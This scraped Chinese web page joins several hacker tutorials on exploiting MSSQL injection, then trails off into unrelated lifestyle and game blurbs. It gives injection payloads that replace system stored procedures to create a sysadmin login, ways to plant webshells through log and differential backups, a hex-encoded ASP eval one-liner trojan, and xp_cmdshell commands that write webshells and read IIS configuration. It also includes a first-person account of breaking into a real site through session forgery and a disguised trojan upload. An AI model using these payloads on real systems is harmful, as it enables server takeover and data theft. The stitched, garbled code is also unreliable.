mssql注入:msSQL注入通杀 只要有注入点就有系统权限
阅读：680次&&&时间： 19:37:38&&
不知道大家看过这篇文章没有可以在db_owner角色下添加SYSADMIN帐号这招真狠啊存在MSSQL注射漏洞服务器又要遭殃了思路方法主要是利用db_owner可以修改sp_addlogin和sp_addsrvrolemember这两个存储过程饶过了验证部分具体思路方法如下:先输入drop procedure sp_addlogin,然后在IE里面输入create procedure& sp_addlogin &&& @loginame& sysname && ,@passwd&&&&&&&& sysname = Null && ,@defdb&&&&&&&&& ; ; sysname = ’master’&&&&& -- UNDONE: DEFAULT& CONFIGURABLE??? && ,@deflanguage&&& sysname = Null && ,@sid&& varbinary(16) = Null && ,@encryptopt& varchar(20) = Null AS &&& -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES -- & nocount _disibledevent=>& (@ret 〈〉 0) &&&&&&&
(charindex(’\’, @loginame) 〉 0) &&& begin &&&&&&& raiserror(1,@loginame) &&&&&&&
(1) &&& end &--Note: dferent
sa is allowed. & (@loginame = ’sa’ or lower(@loginame) in (’public’)) &begin & raiserror(15405, -1 ,-1, @loginame) &
(1) &end &&& -- LOGIN NAME MUST NOT ALREADY EXIST -- & exists(select * from master.dbo.syslogins where loginname =& @loginame) &begin & raiserror(1,@loginame) &
(1) &end &-- VALIDATE DEFAULT DATABASE -- &IF db_id(@defdb) IS NULL &begin & raiserror(1,@defdb) &&&&
(1) &end &-- VALIDATE DEFAULT LANGUAGE -- &IF (@deflanguage IS NOT Null) &begin & Execute @ret = sp_validlang @deflanguage & IF (@ret 〈〉 0) &&
(1) &end &ELSE &begin & select @deflanguage = name from master.dbo.syslanguages & where langid = @@default_langid --server default& language &
@deflanguage is null && select @deflanguage = N’us_english’ &end &-- VALIDATE SID IF GIVEN -- & ((@sid IS NOT Null) and (datalength(@sid) 〈〉 16)) &begin & raiserror(1) &&
(1) &end &
@sid is null & select @sid = id & (suser_sname(@sid) IS NOT Null) &begin & raiserror(1) &&
(1) &end &-- VALIDATE AND USE ENCRYPTION OPTION -- &declare @xstatus small &select @xstatus = 2 -- access & @encryptopt is null & select @passwd = pwdencrypt(@passwd) &
@encryptopt = ’skip_encryption_old’ &begin & select @xstatus = @xstatus | 0x800, -- old-style& encryption && @passwd = convert(sysname, convert(varbinary (30), convert(varchar(30), @passwd))) &end &
@encryptopt 〈〉 ’skip_encryption’ &begin & raiserror(1,’sp_addlogin’) &
1 &end &&& -- ATTEMPT THE INSERT OF THE NEW LOGIN -- &INSERT INTO master.dbo.sysxlogins VALUES &&&&&&& (NULL, @sid, @xstatus, getdate, &&&&&&&&&&&& getdate, @loginame, convert(varbinary(256), @passwd), &&&&&&&&&&&& db_id(@defdb), @deflanguage) & @@error 〈〉 0& -- this indicates we saw duplicate row &&&&&&&
(1) &-- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE& SYSLOGINS CHANGE -- &exec(’use master grant all to null’) &&& -- FINALIZATION: RETURN SUCCESS/FAILURE -- &raiserror(1) && (0) -- sp_addlogin GO OK,我们新建个用户exec master..sp_addlogin xwq
再drop procedure sp_addsrvrolemember,然后在IE里输入
create procedure sp_addsrvrolemember &&& @loginame sysname,&& -- login name &&& @rolename sysname = NULL -- server role name as &&& -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES -- & nocount _disibledevent=>&&& begin &&&&&&& raiserror(15405, -1 ,-1, @loginame) &&&&&&&
(1) &&& end &&& -- OBTAIN THE BIT FOR THIS ROLE -- &&& select @rolebit = CASE @rolename &&&&&&&&&&&& WHEN ’sysadmin’&&&&&&&& THEN 16 &&&&&&&&&&&& WHEN ’securityadmin’&&& THEN 32 &&&&&&&&&&&& WHEN ’serveradmin’&&&&& THEN 64 &&&&&&&&&&&& WHEN ’upadmin’&&&&&& THEN 128 &&&&&&&&&&&& WHEN ’processadmin’&&&& THEN 256 &&&&&&&&&&&& WHEN ’diskadmin’&&&&&&& THEN 512 &&&&&&&&&&&& WHEN ’dbcreator’&&&&&&& THEN 1024 && WHEN ’bulkadmin’& THEN 4096 &&&&&&&&&&&& ELSE NULL END &&& -- ADD ROW FOR NT LOGIN IF NEEDED -- & not exists(select * from master.dbo.syslogins where& loginname = @loginame) &&& begin &&&&&&& execute @ret = sp_MSaddlogin_implicit_ntlogin @loginame &&&&&&&
(@ret 〈〉 0) &&&& begin &&&&& raiserror(1,@loginame) &&&&&
(1) &&&& end &&& end &&& -- UPDATE ROLE MEMBERSHIP -- &&& update master.dbo.sysxlogins
xstatus = xstatus | @rolebit,& xdate2 = getdate &&&& where name = @loginame and srvid IS NULL &-- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE& SYSLOGINS CHANGE -- &exec(’use master grant all to null’) &raiserror(1,@loginame,@rolename) &&& -- FINALIZATION: RETURN SUCCESS/FAILURE & (@@error) -- sp_addsrvrolemember GO
接着再exec master..sp_addsrvrolemember xwq,sysadmin 这样就建立了个SA用户了用SQL连接器连接上就OK了很爽吧不过在实战过程中发现用NBSQL命令执行时会提示发送可能是代码太长了缘故用IE又不方便希望哪位能发个执行SQL语句工具来方便大家OK到此结束
上篇文章: 动感商城最新注入漏洞
下篇文章: 另类上传入侵
[商业源码]&
[商业源码]&
[商业源码]&
[商业源码]&
[商业源码]&
[商业源码]&
[商业源码]&
[商业源码]&
[商业源码]&
[商业源码]&
Copyright &
All Rights Reserved一般新手扫到不显错的SA（systemadmin）的注入点时，虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了，今天我给大家演示下如何利用。方法很简单大家看操作。
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
这里的主机环境：MSSQL+JSP 权限为不显错的SA，支持多行执行 xp_cmdshell存活 服务器处于内网，WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003，IIS，404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面，然后访问WEB站点的一个不存在的目录得到命令执行结果，刺探服务器信息。
1.日志备份获得Webshell
2.数据库差异备份获得Webshell
4.直接下载******远控******。
5.直接下载LCX将服务器端口转发出来
6.通过XP_CMDSHELL 执行命令读取iis配置文件（C:\Windows\system32\inetsrv\MetaBase.xml ）分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
在这里我就不浪费大家时间了，我已经测试过& 日志备份和 数据库差异备份 都没有成功 我就不演示了。& 直接下载************。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了，
我直接演示后面一个方法
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
◆日志备份：
1. 进行初始备份; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '&e:\wwwroot\m.asp&' With Init--
2. 插入数据;Insert Into ttt Values(0x253E3CAE253E)--
0x253E3CAE253E&& 为 一句话木马 %&&%eval(request(chr(97))):response.end%&&&3. 备份并获得文件，删除临时表;Backup Log &数据库名& To Disk = '&e:\wwwroot\m.asp&';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
◆数据库差异备份
（1. 进行差异备份准备工作
;Declare @a SSet @a=db_name();Declare @file VarChar(400);Set @file=&0x633A5C7370&;Drop Table ttt Create Table ttt(c Image) Backup Database @a To&--
上面的 0x633A5C7370& 是 c:\test.asp 路径转换后的16进制编码&
（2. 将数据写入到数据库;Insert Into ttt Values(0x253E3CAE253E)--
0x253E3CAE253E&& 为 一句话****** %&&%eval(request(chr(97))):response.end%&
3. 备份数据库并清理临时文件
;Declare @b SysNSet @b=db_name();Declare @file1 VarChar(400);Set @file1=&0x633A5C7370&;Backup Database @b To&&With Differential,FDrop T--
0x633A5C7370& 为 c:\test.asp& 删除临时文件
用^转义字符来写ASP(一句话木马)文件的方法:&&
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^&script language=VBScript runat=server^&execute request^("90"^)^&/script^& &c:\mu.asp';--
2.CMD下执行 echo ^&%execute^(request^("l"^)^)%^& &c:\mu.asp
读取IIS配置信息获取web路径
&&&&&&&&& 注入点后面执行&& ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
执行命令&&&&&&&&& 注入点后面执行&& ;exec master..xp_cmdshell 'ver &C:\Windows\Help\iisHelp\common\404b.htm'--
参考文章：drops.wooyun.org/tips/401
MSSQL Sa账户弱口令利用总结&https://maoxian.de/2011/12/mssql-sa%E8%B4%A6%E6%88%B7%E5%BC%B1%E5%8F%A3%E4%BB%A4%E5%88%A9%E7%94%A8%E6%80%BB%E7%BB%93/50.html
阅读(...) 评论()黑客经验谈 MSSQLSA权限入侵的感悟
黑客经验谈 MSSQLSA权限入侵的感悟,黑客经验谈 MSSQLSA权限入侵的感悟
想必大家都知道MSSQL中SA权限是什么，可以说是至高无上。今天我就它的危害再谈点儿，我所讲的是配合NBSI上传功能得到WebShell。在讲之前先说几个条件，否则得到Shell是有难度的。　　1.存在SQL注入，并且数据库类型是MSSQL。　　2.连接数据库的权限必须是SA。　　3.后台必须有文件上传的程序。　　好了，我们找到一个网址hxxp://www.******.com/fangchan/listpro.asp?id=53，用NBSI一会就一目了然了。　　很好，数据库类型是MSSQL，权限是SA，再看看第三个条件满足不满足。找到页面中的文章(新闻)，看看里面的图片的地址是什么。好!一看就明白了hxxp:///admin/2xx4329.gif，你明白了吗?特别是2xx4329.gif 这下我们敢肯定后台有上传文件的功能了。下面做什么呢?晕，找出该网站所在的路径呀。这个嘛就得全靠NBSI的NB Commander(NB Tree_List)功能了(在这里我推荐大家用NB Commander，为什么呢?看完文章就知道了)，不过找出网站所在的真实路径需要花一定的时间，那就看你有没有耐心了。我敢说只要有耐心，肯定能找出网站所在的真实路径。这里我找到了这个站点所在的路径D:9x3x9，接着就是后台了，很快就得到Admin/login.asp，接下来就是账号和密码的猜解了。不过我这次猜解出现了问题。说什么也弄不出他的账号和密码，难道都是空的?我不相信，就试着登录了一下，结果失败了。于是从这开始，NB Commander功能就显得非常重要了(因为大家都知道，列目录NB Command和NB Tree_List都能实现)，我找到文件conn.asp，用type D:9x3x9adminlogining.asp命令看了看源代码。　　够狠吧!读了读代码没有问题呀!就是用的admin表字段也一样，不多说了，谁能知道其中的原因?请告诉俺一下，也让俺这只菜鸟走出困惑。进不了后台怎么上传图片呢?这里我用NBSI的上传功能，我试过了，没有成功。因为我传上去后，看到代码每行都重复三次，也不知是为什么，就是用臭要饭的Getwebshell也是同样的结果。　　我想有了，看看它的Session是怎么验证的，又是一个type D:9x3x9adminquanxian.asp。通过分析很快就明白了，它给Session(“wsl”)赋了一个值为1，哈哈!我写了一个非常简单的程序。用NBSI的上传功能传了上去，我想不管重复几次都是正确的(这里你又会想到什么呢?如果密码是MD5的，我们没有必要去爆破了，弄个session就ok了)，传上去保存为1.asp，然后我访问hxxp://www.******.com/admin/1.asp，接着访问hxxp://www.********.com/admin/admin_index.asp，就这样进入了后台，本地测试。　　小提示：Session变量和cookies是同一类型的。如果某用户将浏览器设置为不兼容任何cookie，那么该用户就无法使用这个Session变量! 当一个用户访问某页面时，每个Session变量的运行环境便自动生成，这些Session变量可在用户离开该页面后仍保留20分钟!(事实上，这些变量一直可保留至“timeout”。“timeout”的时间长短由Web服务器管理员设定。一些站点上的变量仅维持了3分钟，一些则为10分钟，还有一些则保留至默认值20分钟。)所以，如果在Session中置入了较大的对象(如ADO recordsets，connections， 等等)，那就有麻烦了!随着站点访问量的增大，服务器将会因此而无法正常运行!　　因为创建Session变量有很大的随意性，可随时调用，不需要开发者做精确地处理。所以，过度使用session变量将会导致代码不可读而且不好维护。　　这样我找到上传图片的地方，把asp木马改成.gif传了上去，记住了上传后的名字，这里是uploadpic2xx.gif，那么你会想到什么呢?哈哈我想起来了，把图片copy成.asp的，或者重命名成.asp的。　　好了，到这里我们的马就算是上去了，至于以后的事情就不提了。　　总结：SA的确给我们带来了很大危害，所以程序员在连接MSSQL数据库的时候千万不能用它，否则服务器成为肉鸡的可能性非常非常的大。还有，MSSQL 的扩展存储功能，用不到它就删除，留着就成了黑客的利器。
来源:/n/6622.html
热门搜索：
怎样恢复被禁用的Windows用户帐户
PPT背景音乐设置方法 如何在PPT插入背景音乐
本地连接不见了怎么办
电脑创建一键关闭所有程序方法
您可能会发现，经常看到在短视频有人在表演的时候说一些鼓励的话，然后就是双击666，听的您或许摸不清头脑，我就在这里为您解答一下，请给我点赞，让我解答更加有动力。
您是否熟悉我们生活的城市是怎么命名而来的呢？中国城市的命名可是有很深的文化底蕴和历史背景的,你都知道么?我从网上搜集了大量的城市名来源，让您好好的涨涨知识，您准备好了吗？
对于爱美人士来说，美白护肤是不分季节的，即使在冬季，依然需要做好皮肤护理工作。饮食调理是护肤的一项重要措施，那么冬天美白吃什么水果呢?接下来就和我一起来看看了解一下冬季美白吃什么水果好！
产妇顺产以后多久可以洗头发？有很多产妇为了防止自己受寒所以在产后不让自己洗头发，但是又特别难受，这篇文章讲述了产妇顺产以后多长时间可以洗头发，通过这篇文章了解产妇顺产以后多久可以洗头发吧。
阴阳师是现在相当火热的一款手游，最近阴阳师又有了新的更新，玩家可以通过挑战副本来获取妖刀姬樱雨刀舞皮肤。可是的很多人不知道阴阳师妖刀姬副本阵容是怎样的，下面就给大家来详细介绍吧。
阴阳师是现在很火热的一款手机游戏，这款游戏一直在更新完善，受到很多人的追捧，就在最近阴阳师又推出了小鹿男，小鹿男作为SSR式神，很多人对它还不是很了解，下面就给大家来介绍阴阳师小鹿男御魂以及阵容搭配吧。
我们在玩阴阳师完成悬赏任务的时候，都会要求玩家找到各种式神的位置，可是很多人不知道阴阳师跳跳哥哥在哪里刷、哪里多，下面就给大家来详细介绍吧，希望对大家玩游戏有所帮助。
京津冀及周边地区出现持续雾霾天气，很是让孕妈妈们担心。持续的雾霾天气对孕妇产生了很大的影响，那么雾霾天气对孕妇危害有多大？雾霾天气孕妇怎么办？下面的文章详细介绍 了雾霾天气对孕妇的危害，一起来看看吧。
我们知道宝宝刚刚出生的时候口腔里是没有牙齿的，一般孩子在四个月以后慢慢开始出牙，每个孩子的体质不一样，所以出牙的时间也是有所差异的，宝宝出牙的时候身体会出现一些症状，家长们要及时的护理好，下面一起来看看宝宝长牙的症状有哪些。
肚子上的赘肉看上去让人烦恼，尤其是对于想穿裙子的女生来说更是一件郁闷的事情。现在减肥的方法有很多，但是很多人并不知道专门瘦肚子的方法。那么，如何瘦肚子呢？下面就给大家介绍几种减肚子的方法吧。}